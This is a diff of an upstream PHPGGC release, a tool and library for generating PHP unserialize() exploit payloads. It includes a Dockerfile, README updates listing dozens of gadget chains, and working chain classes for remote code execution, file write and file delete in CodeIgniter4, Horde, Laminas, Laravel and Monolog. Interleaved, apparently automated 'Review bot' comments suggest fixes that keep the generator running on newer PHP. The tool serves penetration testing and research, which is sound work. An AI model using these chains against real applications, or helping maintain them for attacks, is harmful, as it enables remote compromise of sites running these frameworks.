New upstream version 0.20210218
Arnaud Rebillout
3 years ago
0 | FROM php:7.4-cli-alpine AS builder | |
1 | ||
2 | COPY . /phpggc | |
3 | ||
4 | WORKDIR /phpggc | |
5 | ||
6 | RUN chmod +x phpggc && echo "phar.readonly=0" > $PHP_INI_DIR/php.ini | |
7 | ||
8 | ENTRYPOINT ["/phpggc/phpggc"] |
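Review bot: The RUN line on line 6 writes `phar.readonly=0` straight to `$PHP_INI_DIR/php.ini`, replacing whatever php.ini the image holds rather than layering one setting on top of the base configuration; the official php images load drop-ins from `$PHP_INI_DIR/conf.d/`, so `echo "phar.readonly=0" > "$PHP_INI_DIR/conf.d/phar.ini"` keeps the base configuration intact and makes the override discoverable by name. The `AS builder` alias on line 0 is never referenced by a later stage, so it reads as a leftover unless a multi-stage build is planned. A short comment above the RUN, such as `# phar.readonly=0 is presumably needed by the PHAR output mode; confirm against the README`, would record why the override exists.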
1 | 1 | |
2 | 2 | *PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically*. |
3 | 3 | When encountering an unserialize on a website you don't have the code of, or simply when trying to build an exploit, this tool allows you to generate the payload without having to go through the tedious steps of finding gadgets and combining them. It can be seen as the equivalent of [frohoff's ysoserial](https://github.com/frohoff/ysoserial), but for PHP. |
4 | Currently, the tool supports: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework. | |
4 | Currently, the tool supports gadget chains such as: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework. | |
5 | 5 | |
6 | 6 | |
7 | 7 | ## Requirements |
8 | 8 | |
9 | 9 | PHP >= 5.6 is required to run PHPGGC. |
10 | PHP 8 is not yet supported. | |
10 | 11 | |
11 | 12 | |
12 | 13 | ## Usage |
19 | 20 | Gadget Chains |
20 | 21 | ------------- |
21 | 22 | |
22 | NAME VERSION TYPE VECTOR I | |
23 | CodeIgniter4/RCE1 4.0.0-beta.1 <= ? rce __destruct | |
24 | Doctrine/FW1 ? file_write __toString * | |
25 | Drupal7/FD1 7.0 < ? file_delete __destruct * | |
26 | Drupal7/RCE1 7.0.8 < ? rce __destruct * | |
27 | Guzzle/FW1 6.0.0 <= 6.3.3+ file_write __destruct | |
28 | Guzzle/INFO1 6.0.0 <= 6.3.2 phpinfo() __destruct * | |
29 | Guzzle/RCE1 6.0.0 <= 6.3.2 rce __destruct * | |
30 | Laravel/RCE1 5.4.27 rce __destruct | |
31 | Laravel/RCE2 5.5.39 rce __destruct | |
32 | Laravel/RCE3 5.5.39 rce __destruct * | |
33 | Laravel/RCE4 5.5.39 rce __destruct | |
34 | Laravel/RCE5 5.8.30 rce __destruct * | |
35 | Laravel/RCE6 5.5.* rce __destruct * | |
36 | Magento/FW1 ? <= 1.9.4.0 file_write __destruct * | |
37 | Magento/SQLI1 ? <= 1.9.4.0 sql_injection __destruct | |
38 | Monolog/RCE1 1.18 <= 1.23 rce __destruct | |
39 | Monolog/RCE2 1.5 <= 1.17 rce __destruct | |
40 | Phalcon/RCE1 <= 1.2.2 rce __wakeup * | |
41 | Pydio/Guzzle/RCE1 < 8.2.2 rce __toString | |
42 | Slim/RCE1 3.8.1 rce __toString | |
43 | SwiftMailer/FD1 -5.4.12+, -6.2.1+ file_delete __destruct | |
44 | SwiftMailer/FW1 5.1.0 <= 5.4.8 file_write __toString | |
45 | SwiftMailer/FW2 6.0.0 <= 6.0.1 file_write __toString | |
46 | SwiftMailer/FW3 5.0.1 file_write __toString | |
47 | SwiftMailer/FW4 4.0.0 <= ? file_write __destruct | |
48 | Symfony/FW1 2.5.2 file_write DebugImport * | |
49 | Symfony/FW2 3.4 file_write __destruct | |
50 | Symfony/RCE1 3.3 rce __destruct * | |
51 | Symfony/RCE2 2.3.42 < 2.6 rce __destruct * | |
52 | Symfony/RCE3 2.6 <= 2.8.32 rce __destruct * | |
53 | Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 rce __destruct * | |
54 | ThinkPHP/RCE1 5.1.x-5.2.x rce __destruct * | |
55 | WordPress/Guzzle/RCE1 4.0.0 <= 6.4.1+ rce __toString * | |
56 | WordPress/Guzzle/RCE2 4.0.0 <= 6.4.1+ rce __destruct * | |
57 | WordPress/P/WooCommerce/RCE1 3.4.0 <= 3.6.2+ rce __destruct * | |
58 | WordPress/P/YetAnotherStarsRating/RCE1 ? <= 1.8.6 rce __destruct * | |
59 | Yii/RCE1 1.1.20 rce __wakeup * | |
60 | ZendFramework/FD1 ? <= 1.12.20 file_delete __destruct | |
61 | ZendFramework/RCE1 ? <= 1.12.20 rce __destruct * | |
62 | ZendFramework/RCE2 1.11.12 <= 1.12.20 rce __toString * | |
63 | ZendFramework/RCE3 2.0.1 <= ? rce __destruct | |
23 | NAME VERSION TYPE VECTOR I | |
24 | CodeIgniter4/RCE1 4.0.0-beta.1 <= 4.0.0-rc.4 RCE (Function call) __destruct | |
25 | CodeIgniter4/RCE2 4.0.0-rc.4 <= 4.0.4+ RCE (Function call) __destruct | |
26 | Doctrine/FW1 ? File write __toString * | |
27 | Drupal7/FD1 7.0 < ? File delete __destruct * | |
28 | Drupal7/RCE1 7.0.8 < ? RCE (Function call) __destruct * | |
29 | Guzzle/FW1 6.0.0 <= 6.3.3+ File write __destruct | |
30 | Guzzle/INFO1 6.0.0 <= 6.3.2 phpinfo() __destruct * | |
31 | Guzzle/RCE1 6.0.0 <= 6.3.2 RCE (Function call) __destruct * | |
32 | Horde/RCE1 <= 5.2.22 RCE (PHP code) __destruct * | |
33 | Laminas/FD1 <= 2.11.2 File delete __destruct | |
34 | Laravel/RCE1 5.4.27 RCE (Function call) __destruct | |
35 | Laravel/RCE2 5.5.39 RCE (Function call) __destruct | |
36 | Laravel/RCE3 5.5.39 RCE (Function call) __destruct * | |
37 | Laravel/RCE4 5.5.39 RCE (Function call) __destruct | |
38 | Laravel/RCE5 5.8.30 RCE (PHP code) __destruct * | |
39 | Laravel/RCE6 5.5.* RCE (PHP code) __destruct * | |
40 | Laravel/RCE7 ? <= 8.16.1 RCE (Function call) __destruct * | |
41 | Magento/FW1 ? <= 1.9.4.0 File write __destruct * | |
42 | Magento/SQLI1 ? <= 1.9.4.0 SQL injection __destruct | |
43 | Monolog/RCE1 1.18 <= 2.1.1+ RCE (Function call) __destruct | |
44 | Monolog/RCE2 1.5 <= 2.1.1+ RCE (Function call) __destruct | |
45 | Monolog/RCE3 1.1.0 <= 1.10.0 RCE (Function call) __destruct | |
46 | Monolog/RCE4 ? <= 2.4.4+ RCE (Command) __destruct * | |
47 | Phalcon/RCE1 <= 1.2.2 RCE __wakeup * | |
48 | PHPCSFixer/FD1 <= 2.17.3 File delete __destruct | |
49 | PHPCSFixer/FD2 <= 2.17.3 File delete __destruct | |
50 | PHPExcel/FD1 1.8.2+ File delete __destruct | |
51 | PHPExcel/FD2 <= 1.8.1 File delete __destruct | |
52 | PHPExcel/FD3 1.8.2+ File delete __destruct | |
53 | PHPExcel/FD4 <= 1.8.1 File delete __destruct | |
54 | Pydio/Guzzle/RCE1 < 8.2.2 RCE (Function call) __toString | |
55 | Slim/RCE1 3.8.1 RCE (Function call) __toString | |
56 | Smarty/FD1 ? File delete __destruct | |
57 | Smarty/SSRF1 ? SSRF __destruct * | |
58 | SwiftMailer/FD1 -5.4.12+, -6.2.1+ File delete __destruct | |
59 | SwiftMailer/FW1 5.1.0 <= 5.4.8 File write __toString | |
60 | SwiftMailer/FW2 6.0.0 <= 6.0.1 File write __toString | |
61 | SwiftMailer/FW3 5.0.1 File write __toString | |
62 | SwiftMailer/FW4 4.0.0 <= ? File write __destruct | |
63 | Symfony/FW1 2.5.2 File write DebugImport * | |
64 | Symfony/FW2 3.4 File write __destruct | |
65 | Symfony/RCE1 3.3 RCE (Command) __destruct * | |
66 | Symfony/RCE2 2.3.42 < 2.6 RCE (PHP code) __destruct * | |
67 | Symfony/RCE3 2.6 <= 2.8.32 RCE (PHP code) __destruct * | |
68 | Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 RCE (Function call) __destruct * | |
69 | TCPDF/FD1 <= 6.3.5 File delete __destruct * | |
70 | ThinkPHP/RCE1 5.1.x-5.2.x RCE (Function call) __destruct * | |
71 | WordPress/Dompdf/RCE1 0.8.5+ & WP < 5.5.2 RCE (Function call) __destruct * | |
72 | WordPress/Dompdf/RCE2 0.7.0 <= 0.8.4 & WP < 5.5.2 RCE (Function call) __destruct * | |
73 | WordPress/Guzzle/RCE1 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __toString * | |
74 | WordPress/Guzzle/RCE2 4.0.0 <= 6.4.1+ & WP < 5.5.2 RCE (Function call) __destruct * | |
75 | WordPress/P/EmailSubscribers/RCE1 4.0 <= 4.4.7+ & WP < 5.5.2 RCE (Function call) __destruct * | |
76 | WordPress/P/EverestForms/RCE1 1.0 <= 1.6.7+ & WP < 5.5.2 RCE (Function call) __destruct * | |
77 | WordPress/P/WooCommerce/RCE1 3.4.0 <= 4.1.0+ & WP < 5.5.2 RCE (Function call) __destruct * | |
78 | WordPress/P/WooCommerce/RCE2 <= 3.4.0 & WP < 5.5.2 RCE (Function call) __destruct * | |
79 | WordPress/P/YetAnotherStarsRating/RCE1 ? <= 1.8.6 & WP < 5.5.2 RCE (Function call) __destruct * | |
80 | WordPress/PHPExcel/RCE1 1.8.2+ & WP < 5.5.2 RCE (Function call) __toString * | |
81 | WordPress/PHPExcel/RCE2 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __toString * | |
82 | WordPress/PHPExcel/RCE3 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct * | |
83 | WordPress/PHPExcel/RCE4 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct * | |
84 | WordPress/PHPExcel/RCE5 1.8.2+ & WP < 5.5.2 RCE (Function call) __destruct * | |
85 | WordPress/PHPExcel/RCE6 <= 1.8.1 & WP < 5.5.2 RCE (Function call) __destruct * | |
86 | Yii/RCE1 1.1.20 RCE (Function call) __wakeup * | |
87 | Yii2/RCE1 <2.0.38 RCE (Function call) __destruct * | |
88 | Yii2/RCE2 <2.0.38 RCE (PHP code) __destruct * | |
89 | ZendFramework/FD1 ? <= 1.12.20 File delete __destruct | |
90 | ZendFramework/RCE1 ? <= 1.12.20 RCE (PHP code) __destruct * | |
91 | ZendFramework/RCE2 1.11.12 <= 1.12.20 RCE (Function call) __toString * | |
92 | ZendFramework/RCE3 2.0.1 <= ? RCE (Function call) __destruct | |
93 | ZendFramework/RCE4 ? <= 1.12.20 RCE (PHP code) __destruct * | |
94 | ||
95 | ``` | |
96 | ||
97 | Filter gadget chains: | |
98 | ||
99 | ``` | |
100 | $ ./phpggc -l laravel | |
101 | ||
102 | Gadget Chains | |
103 | ------------- | |
104 | ||
105 | NAME VERSION TYPE VECTOR I | |
106 | Laravel/RCE1 5.4.27 RCE (Function call) __destruct | |
107 | Laravel/RCE2 5.5.39 RCE (Function call) __destruct | |
108 | Laravel/RCE3 5.5.39 RCE (Function call) __destruct * | |
109 | Laravel/RCE4 5.5.39 RCE (Function call) __destruct | |
110 | Laravel/RCE5 5.8.30 RCE (PHP code) __destruct * | |
111 | Laravel/RCE6 5.5.* RCE (PHP code) __destruct * | |
112 | Laravel/RCE7 ? <= 8.16.1 RCE (Function call) __destruct * | |
64 | 113 | |
65 | 114 | ``` |
66 | 115 | |
139 | 188 | a:1:{s:7:"message";O:18:"Slim\Http\Response":2:{...}} |
140 | 189 | ``` |
141 | 190 | |
191 | ||
142 | 192 | ## PHAR(GGC) |
143 | 193 | |
144 | 194 | ### History |
254 | 304 | For instance, use `./phpggc -n Drupal RCE` would create a new Drupal RCE gadgetchain. |
255 | 305 | |
256 | 306 | |
307 | ||
308 | ## Docker | |
309 | ||
310 | If you don't want to install PHP, you can use `docker build`. | |
311 | ||
312 | ||
257 | 313 | # License |
258 | 314 | |
259 | 315 | [Apache License 2.0](LICENSE) |
1 | 1 | |
2 | 2 | namespace GadgetChain\CodeIgniter4; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | public static $version = '4.0.0-beta.1 <= ?'; | |
6 | public static $version = '4.0.0-beta.1 <= 4.0.0-rc.4'; | |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'eboda'; |
9 | 9 | |
14 | 14 | |
15 | 15 | return new \CodeIgniter\Cache\Handlers\RedisHandler($function, $parameter); |
16 | 16 | } |
17 | } | |
17 | }⏎ |
0 | 0 | <?php |
1 | ||
1 | 2 | namespace CodeIgniter\Cache\Handlers { |
2 | 3 | class RedisHandler { |
3 | 4 | protected $redis; |
66 | 67 | class BaseBuilder { |
67 | 68 | } |
68 | 69 | } |
69 | ||
70 |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\CodeIgniter4; | |
3 | ||
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '4.0.0-rc.4 <= 4.0.4+'; // tested on 4.0.0-rc.4, 4.0.3 & 4.0.4 | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'eboda'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \CodeIgniter\Cache\Handlers\RedisHandler($function, $parameter); | |
16 | } | |
17 | } |
0 | <?php | |
1 | ||
2 | namespace CodeIgniter\Cache\Handlers { | |
3 | class RedisHandler { | |
4 | protected $redis; | |
5 | ||
6 | public function __construct($func, $param) { | |
7 | $this->redis = new \CodeIgniter\Session\Handlers\MemcachedHandler( | |
8 | new \CodeIgniter\Model( | |
9 | new \CodeIgniter\Database\BaseBuilder( | |
10 | new \CodeIgniter\Database\MySQLi\Connection | |
11 | ), | |
12 | new \CodeIgniter\Validation\Validation, | |
13 | $func, | |
14 | new \CodeIgniter\Database\MySQLi\Connection | |
15 | ), | |
16 | array("x" => $param) | |
17 | ); | |
18 | } | |
19 | } | |
20 | } | |
21 | ||
22 | namespace CodeIgniter\Session\Handlers { | |
23 | class MemcachedHandler { | |
24 | protected $memcached; | |
25 | protected $lockKey; | |
26 | ||
27 | public function __construct($memcached, $param) { | |
28 | $this->lockKey = $param; | |
29 | $this->memcached = $memcached; | |
30 | } | |
31 | } | |
32 | } | |
33 | ||
34 | namespace CodeIgniter { | |
35 | class Model { | |
36 | protected $builder; | |
37 | protected $primaryKey; | |
38 | protected $beforeDelete; | |
39 | protected $validationRules; | |
40 | protected $validation; | |
41 | protected $tempAllowCallbacks; | |
42 | ||
43 | public function __construct($builder, $validation, $func, $db) { | |
44 | $this->builder = $builder; | |
45 | $this->primaryKey = null; | |
46 | ||
47 | $this->beforeDelete = array(); | |
48 | $this->beforeDelete[] = "validate"; | |
49 | ||
50 | $this->tempAllowCallbacks = 1; | |
51 | $this->db = $db; | |
52 | ||
53 | $this->cleanValidationRules = false; | |
54 | $this->validation = $validation; | |
55 | $this->validationRules = array( | |
56 | "id.x" => array( | |
57 | "rules" => array($func, "dd") // function "dd" exits the script. | |
58 | ) | |
59 | ); | |
60 | } | |
61 | } | |
62 | } | |
63 | ||
64 | namespace CodeIgniter\Validation { | |
65 | class Validation { | |
66 | protected $ruleSetFiles; | |
67 | ||
68 | public function __construct() { | |
69 | $this->ruleSetFiles = array("finfo"); | |
70 | } | |
71 | } | |
72 | } | |
73 | ||
74 | namespace CodeIgniter\Database { | |
75 | class BaseBuilder { | |
76 | public function __construct($db) { | |
77 | $this->QBFrom = array("()"); | |
78 | $this->db = $db; | |
79 | } | |
80 | } | |
81 | } | |
82 | ||
83 | namespace CodeIgniter\Database\MySQLi { | |
84 | class Connection { | |
85 | } | |
86 | } | |
87 |
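Review bot: `Model::__construct` assigns `$this->db` (line 51) and `$this->cleanValidationRules` (line 53), and `BaseBuilder::__construct` assigns `$this->QBFrom` and `$this->db` (lines 77–78), without declaring those properties; from PHP 8.2 creating dynamic properties emits a deprecation notice, and this same commit removes the "PHP 8 is not yet supported" line from the README, so the generator should run notice-free there. Declaring them next to the existing ones is the whole change, e.g. `public $db;` and `public $cleanValidationRules;` in Model and `public $QBFrom;` and `public $db;` in BaseBuilder — note that `public` is the behaviour-preserving choice, because a dynamic property serializes under its bare name exactly as a declared public property does, whereas `protected`/`private` would change the mangled property name in the output. The same pattern appears in the Laminas `Stream` class (`cleanup`, `streamName`), in PhpCsFixer `FileRemoval` (`files`) and in `ProcessLinter` (`temporaryFile`, `fileRemoval`) added by this commit.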
15 | 15 | public static $version = '?'; |
16 | 16 | public static $vector = '__toString'; |
17 | 17 | public static $author = 'cf'; |
18 | public static $informations = ' | |
18 | public static $information = ' | |
19 | 19 | We do not have full control of the path. If you enter |
20 | 20 | /var/www/toto/shell.php as the remote_path, it will be converted to |
21 | 21 | /var/www/toto/e3/5b737464436c61737324434c4153534d455441444154415d5b315d.php. |
6 | 6 | public static $version = '7.0 < ?'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'rreiss'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | Note that some files may not be removed (depends on permissions) |
11 | 11 | '; |
12 | 12 |
1 | 1 | |
2 | 2 | namespace GadgetChain\Drupal7; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '7.0.8 < ?'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'Blaklis'; |
9 | public static $informations = 'You will need to post form_build_id=DrupalRCE to /?q=system/ajax once the payload is unserialized'; | |
9 | public static $information = 'You will need to post form_build_id=DrupalRCE to /?q=system/ajax once the payload is unserialized'; | |
10 | 10 | |
11 | 11 | public function generate(array $parameters) |
12 | 12 | { |
6 | 6 | public static $version = '6.0.0 <= 6.3.2'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'erwan_lr'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | This chain requires GuzzleHttp\Psr7 < 1.5.0, because FnStream cannot be |
11 | 11 | deserialized afterwards. |
12 | 12 | See https://github.com/ambionics/phpggc/issues/34 |
1 | 1 | |
2 | 2 | namespace GadgetChain\Guzzle; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '6.0.0 <= 6.3.2'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'proclnas'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | This chain requires GuzzleHttp\Psr7 < 1.5.0, because FnStream cannot be |
11 | 11 | deserialized afterwards. |
12 | 12 | See https://github.com/ambionics/phpggc/issues/34 |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Horde; | |
3 | ||
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\PHPCode | |
5 | { | |
6 | public static $version = '<= 5.2.22'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $foundby = 'EgiX'; | |
9 | public static $author = 'mr_me'; | |
10 | public static $information = ' | |
11 | This chain was used against 34 different 0day endpoints targeting Horde v5.2.22. Other versions are probably affected | |
12 | See https://srcincite.io/blog/2020/08/19/a-smorgashorde-of-vulnerabilities-a-comparative-analysis-of-discovery.html | |
13 | '; | |
14 | ||
15 | public function generate(array $parameters) | |
16 | { | |
17 | $code = $parameters['code'] . ';die;'; | |
18 | return new \Horde_Kolab_Server_Decorator_Clean($code); | |
19 | } | |
20 | } | |
21 | ?> |
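Review bot: The file ends with a closing `?>` tag on line 21; for a PHP-only file the convention (PSR-12) is to omit it, since any whitespace after the tag beyond a single newline is sent as output, and none of the other gadget-chain classes in this commit carry one. Deleting the `?>` line is the whole change. The same trailing tag is present in the Horde `chain.php` and in both PHPCSFixer `chain.php` files added here.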
0 | <?php | |
1 | ||
2 | class Horde_Config | |
3 | { | |
4 | protected $_oldConfig; | |
5 | function __construct($code) | |
6 | { | |
7 | $this->_oldConfig = $code; | |
8 | } | |
9 | } | |
10 | ||
11 | class Horde_Prefs_Scope implements Serializable | |
12 | { | |
13 | protected $_prefs = array(1); | |
14 | protected $scope; | |
15 | public function serialize() | |
16 | { | |
17 | return json_encode(array( | |
18 | $this->scope, | |
19 | $this->_prefs | |
20 | )); | |
21 | } | |
22 | ||
23 | public function unserialize($data) | |
24 | { | |
25 | list($this->scope, $this->_prefs) = json_decode($data, true); | |
26 | } | |
27 | } | |
28 | ||
29 | class Horde_Prefs | |
30 | { | |
31 | protected $_opts, $_scopes; | |
32 | function __construct($code) | |
33 | { | |
34 | $this->_opts['sizecallback'] = array(new Horde_Config($code), 'readXMLConfig'); | |
35 | $this->_scopes['horde'] = new Horde_Prefs_Scope; | |
36 | } | |
37 | } | |
38 | ||
39 | class Horde_Prefs_Identity | |
40 | { | |
41 | protected $_prefs, $_prefnames, $_identities; | |
42 | function __construct($code) | |
43 | { | |
44 | $this->_identities = array(0); | |
45 | $this->_prefs = new Horde_Prefs($code); | |
46 | $this->_prefnames['identities'] = 0; | |
47 | } | |
48 | } | |
49 | ||
50 | class Horde_Kolab_Server_Decorator_Clean | |
51 | { | |
52 | private $_server, $_added; | |
53 | function __construct($code) | |
54 | { | |
55 | $this->_added = array(0); | |
56 | $this->_server = new Horde_Prefs_Identity($code); | |
57 | } | |
58 | } | |
59 | ?> |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Laminas; | |
3 | ||
4 | class FD1 extends \PHPGGC\GadgetChain\FileDelete | |
5 | { | |
6 | public static $version = '<= 2.11.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'MrTuxracer'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $remote_file = $parameters["remote_file"]; | |
13 | ||
14 | return new \Laminas\Http\Response\Stream($remote_file); | |
15 | } | |
16 | } |
0 | <?php | |
1 | namespace Laminas\Http\Response { | |
2 | class Stream { | |
3 | function __construct($remote_file) { | |
4 | $this->cleanup = '1'; | |
5 | $this->streamName = $remote_file; | |
6 | } | |
7 | } | |
8 | } |
1 | 1 | |
2 | 2 | namespace GadgetChain\Laravel; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '5.4.27'; |
7 | 7 | public static $vector = '__destruct'; |
1 | 1 | |
2 | 2 | namespace GadgetChain\Laravel; |
3 | 3 | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '5.5.39'; |
7 | 7 | public static $vector = '__destruct'; |
1 | 1 | |
2 | 2 | namespace GadgetChain\Laravel; |
3 | 3 | |
4 | class RCE3 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '5.5.39'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'BlackFan'; |
9 | public static $informations = 'This chain triggers an ErrorException after code execution.'; | |
9 | public static $information = 'This chain triggers an ErrorException after code execution.'; | |
10 | 10 | |
11 | 11 | public function generate(array $parameters) |
12 | 12 | { |
1 | 1 | |
2 | 2 | namespace GadgetChain\Laravel; |
3 | 3 | |
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '5.5.39'; |
7 | 7 | public static $vector = '__destruct'; |
1 | 1 | |
2 | 2 | namespace GadgetChain\Laravel; |
3 | 3 | |
4 | class RCE5 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE5 extends \PHPGGC\GadgetChain\RCE\PHPCode | |
5 | 5 | { |
6 | 6 | public static $version = '5.8.30'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'Phith0n'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | Executes given PHP code through eval(). |
11 | 11 | Requires Mockery, which is in the require-dev package. |
12 | 12 | '; |
13 | public static $parameters = [ | |
14 | 'code' | |
15 | ]; | |
16 | 13 | |
17 | 14 | public function generate(array $parameters) |
18 | 15 | { |
1 | 1 | |
2 | 2 | namespace GadgetChain\Laravel; |
3 | 3 | |
4 | class RCE6 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE6 extends \PHPGGC\GadgetChain\RCE\PHPCode | |
5 | 5 | { |
6 | 6 | public static $version = '5.5.*'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'Phith0n & holyvier'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | Executes given PHP code through eval(). |
11 | 11 | Requires Mockery, which is in the require-dev package. |
12 | 12 | '; |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Laravel; | |
3 | ||
4 | class RCE7 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '? <= 8.16.1'; // will test for more version at a later date | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'whira'; | |
9 | public static $information = 'This chain throws a RuntimeException immediately after code execution.'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \Illuminate\Broadcasting\PendingBroadcast( | |
17 | $function, | |
18 | $parameter | |
19 | ); | |
20 | } | |
21 | } |
0 | <?php | |
1 | ||
2 | namespace Illuminate\Broadcasting | |
3 | { | |
4 | class PendingBroadcast | |
5 | { | |
6 | protected $events; | |
7 | protected $event; | |
8 | ||
9 | public function __construct($function, $parameter) | |
10 | { | |
11 | $this->events = new \Illuminate\Bus\Dispatcher($function); | |
12 | $this->event = new \Illuminate\Queue\CallQueuedClosure($parameter); | |
13 | } | |
14 | } | |
15 | } | |
16 | ||
17 | namespace Illuminate\Bus | |
18 | { | |
19 | class Dispatcher | |
20 | { | |
21 | protected $queueResolver; | |
22 | ||
23 | public function __construct($function) | |
24 | { | |
25 | $this->queueResolver = $function; | |
26 | ||
27 | } | |
28 | } | |
29 | } | |
30 | ||
31 | namespace Illuminate\Queue | |
32 | { | |
33 | class CallQueuedClosure | |
34 | { | |
35 | protected $connection; | |
36 | ||
37 | public function __construct($parameter) | |
38 | { | |
39 | $this->connection = $parameter; | |
40 | } | |
41 | } | |
42 | } | |
43 | ||
44 |
6 | 6 | public static $version = '? <= 1.9.4.0'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'eboda'; |
9 | public static $informations = 'The <remote_path> is either relative to the Magento root or absolute. The payload will throw an error during unserialization, but the file is written anyway.'; | |
9 | public static $information = 'The <remote_path> is either relative to the Magento root or absolute. The payload will throw an error during unserialization, but the file is written anyway.'; | |
10 | 10 | |
11 | 11 | public function generate(array $parameters) |
12 | 12 | { |
1 | 1 | |
2 | 2 | namespace GadgetChain\Monolog; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | public static $version = '1.18 <= 1.23'; | |
6 | public static $version = '1.18 <= 2.1.1+'; | |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'cf'; |
9 | 9 | |
19 | 19 | ) |
20 | 20 | ); |
21 | 21 | } |
22 | }⏎ | |
22 | } |
1 | 1 | |
2 | 2 | namespace GadgetChain\Monolog; |
3 | 3 | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | public static $version = '1.5 <= 1.17'; | |
6 | public static $version = '1.5 <= 2.1.1+'; | |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'cf'; |
9 | 9 |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Monolog; | |
3 | ||
4 | class RCE3 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '1.1.0 <= 1.10.0'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'theBumble'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $function = $parameters['function']; | |
13 | $parameter = $parameters['parameter']; | |
14 | ||
15 | return new \Monolog\Handler\BufferHandler( | |
16 | ['current', $function], | |
17 | [$parameter, 'level' => null] | |
18 | ); | |
19 | } | |
20 | } |
0 | <?php | |
1 | ||
2 | namespace Monolog\Handler | |
3 | { | |
4 | class NativeMailerHandler { | |
5 | protected $to = null; | |
6 | protected $subject = null; | |
7 | protected $headers = null; | |
8 | ||
9 | protected $level = null; | |
10 | protected $bubble = false; | |
11 | protected $formatter = null; | |
12 | protected $processors; | |
13 | ||
14 | function __construct($methods) { | |
15 | $this->processors = $methods; | |
16 | ||
17 | } | |
18 | } | |
19 | ||
20 | class BufferHandler | |
21 | { | |
22 | protected $handler; | |
23 | protected $bufferSize = -1; | |
24 | protected $buffer; | |
25 | ||
26 | # ($record['level'] < $this->level) == false | |
27 | protected $level = null; | |
28 | protected $bubble = false; | |
29 | protected $formatter = null; | |
30 | protected $processors; | |
